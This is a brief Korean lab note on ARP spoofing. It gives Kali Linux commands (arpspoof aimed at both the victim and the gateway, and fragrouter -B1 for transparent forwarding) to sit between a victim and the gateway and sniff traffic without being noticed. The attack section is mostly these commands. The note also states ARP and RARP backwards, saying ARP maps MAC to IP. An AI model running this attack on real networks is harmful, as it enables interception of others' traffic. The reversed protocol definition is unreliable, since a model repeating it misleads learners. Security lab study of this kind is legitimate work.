ARPSpoofing 실습

ARP

ARP(Address Resolution Protocol)은 네트워크 계층의 프로토콜이다.

ARP는 MAC주소를 IP를 변환하는 프로토콜이며, RARP는 IP를 MAC주소를 변환시켜주는 프로토콜이다.

컴퓨터에는 ARP table이라는 IP와 MAC주소의 매핑 테이블이 있어서 저장하며 주기적으로 업데이트해준다.

 

ART테이블 보는 법

#arp -a

 

ARPSpoofing 

상대방의 ARP table을 속여서 스니핑하는 법

 

1. 3개의 터미널 열기 (ctrl+shift+t)

2. 다음 세 작업해주기

 

root@kali:~#arpspoof [-i 인터페이스]-t 피해자IP 게이트웨이IP

해석 : 피해자야! 게이트웨이 IP의 MAC주소는 나야.

*i는 인터페이스, t는 target이다.

 

root@kali:~#fragrouter -B1

해석: 내가 스니핑하는 것을 알아채지 못하도록 정상적으로 포워딩해준다.

피해자->게이트웨이 포워딩

게이트웨이->피해자 포워딩

 

root@kali:~#arpspoof -t 게이트웨이IP 피해자IP

해석: 게이트웨이야 피해자IP의 MAC주소는 나야~